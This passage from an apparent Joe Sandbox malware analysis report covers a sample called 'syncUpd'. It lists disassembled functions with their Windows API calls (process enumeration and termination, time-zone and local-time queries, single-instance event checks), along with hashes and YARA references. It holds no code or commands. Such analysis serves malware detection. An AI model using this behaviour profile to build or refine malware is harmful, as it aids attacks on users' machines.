                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1c1b07571841af84a2b01cf28d74e2b7f9a03ce27126835c702bcf18e36c141
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415BEB
                                                                                                                                                                                                                                                                • Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                                                • Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                                                • Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415CD6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 396451647-0
                                                                                                                                                                                                                                                              • Opcode ID: 0e7f8b516c05cadfa921e6f98f8774a216040b61a2b6ffbcf4ce966bdf0338b7
                                                                                                                                                                                                                                                              • Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e7f8b516c05cadfa921e6f98f8774a216040b61a2b6ffbcf4ce966bdf0338b7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00905E37 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00905E52
                                                                                                                                                                                                                                                                • Part of subcall function 009056B7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00905E85,00000000), ref: 009056C2
                                                                                                                                                                                                                                                                • Part of subcall function 009056B7: RtlAllocateHeap.NTDLL(00000000), ref: 009056C9
                                                                                                                                                                                                                                                                • Part of subcall function 009056B7: wsprintfW.USER32 ref: 009056DF
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00905F12
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00905F30
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00905F3D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3729781310-0
                                                                                                                                                                                                                                                              • Opcode ID: 6407d1539de54230c31308d720df9c4720da3bccaf40962f38996e6942d990c9
                                                                                                                                                                                                                                                              • Instruction ID: 3526a112bff002b3e87506a21a3b6144f951d810e998d981e3ea494bd0c11945
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6407d1539de54230c31308d720df9c4720da3bccaf40962f38996e6942d990c9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1312AB1E00248AFDB14DFE0CD49BEEB779BF84700F104458E606AA1C4DB79AA45CF51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00905047 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0090506E
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00905082
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00905097
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00905105
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1066202413-0
                                                                                                                                                                                                                                                              • Opcode ID: b52d0566d22262ac0ca84fccd2a79ab41aaba5a1cfdbd13057ab198f5e8d9997
                                                                                                                                                                                                                                                              • Instruction ID: 6dff117a604c327722363333f012f07a5a8137ac49dfe84c2a1c53866fdef325
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52d0566d22262ac0ca84fccd2a79ab41aaba5a1cfdbd13057ab198f5e8d9997
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F210871904618AFCB25EBA0DC95FEEB378AF94704F1041D9A50AA61D1EF746F84CF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FFD47 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3407564107-0
                                                                                                                                                                                                                                                              • Opcode ID: 38c53f5a606269b64edeae665f1f90b57f3911939e66431622d8e48dd442a9d3
                                                                                                                                                                                                                                                              • Instruction ID: 4291e5f43860a2eebb0eb132f307bd413cf0df7a341500e2fd877f898b946bdd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38c53f5a606269b64edeae665f1f90b57f3911939e66431622d8e48dd442a9d3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F114670C0420DEFCB14EFE4D944AEEBB75FF44304F108068EA06A6291EB306B44CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414ED0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                                                                                                              • API String ID: 2716131235-2206825331
                                                                                                                                                                                                                                                              • Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                                                              • Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00416F20 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcatlstrcpy
                                                                                                                                                                                                                                                              • String ID: 6F@$6F@
                                                                                                                                                                                                                                                              • API String ID: 3905823039-140834422
                                                                                                                                                                                                                                                              • Opcode ID: 8506d317a09af5bd4aa6fc40b9ad0c04fc27a29f8cf437679aaa0c638765c5d5
                                                                                                                                                                                                                                                              • Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8506d317a09af5bd4aa6fc40b9ad0c04fc27a29f8cf437679aaa0c638765c5d5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1378416451-0
                                                                                                                                                                                                                                                              • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00905C47 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00901AE0,80000000,00000003,00000000,00000003,00000080,00000000,?,00901AE0,?), ref: 00905C63
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,00901AE0), ref: 00905C80
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00905C8E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1378416451-0
                                                                                                                                                                                                                                                              • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction ID: 56303955406230bec71275922f68589d26b07886e6f279d1c029fa3c3657ee7f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F01D79B00618ABEB20DBB0DC49B5A7779AB44714F11C554AA51A71C4DA7496018B40
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414450 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1243822799-0
                                                                                                                                                                                                                                                              • Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 009046B7 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 009046C4
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 009046CB
                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 009046D8
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00904707
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 377395780-0
                                                                                                                                                                                                                                                              • Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00904717 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00624A44,00000000,?,0041D758,00000000,?,00000000,00000000,?,00624B08,00000000), ref: 00904727
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0090472E
                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00904741
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0090477B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3317088062-0
                                                                                                                                                                                                                                                              • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction ID: 8b90dbba440bf85468cc069a633efd3669ba731577f88e7a7be07616b4074d71
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF067B0A047289FDB309B60DD49BA9737ABB04311F0002D5EA1AE3290DB745E858F83
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00903A1A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 009039F1
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00903A0F
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00903A20
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 00903A2B
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 00903A41
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00903A49
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                                                                                                                                              • Opcode ID: a22c4b3d544938e112ab0244007d15e0e25d35ff1a82b9a1ac98b22b723a5bcb
                                                                                                                                                                                                                                                              • Instruction ID: 2fb14cfe8f18669cda12612b42910e9d944f6a21ddceb6225bbc464a73fb16cd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a22c4b3d544938e112ab0244007d15e0e25d35ff1a82b9a1ac98b22b723a5bcb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADF08C74A48209AFFB20ABE0EC4ABBDB67CBF58701F108914B552A50C0DBB09600EA61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Pi@
                                                                                                                                                                                                                                                              • API String ID: 0-1360946908
                                                                                                                                                                                                                                                              • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
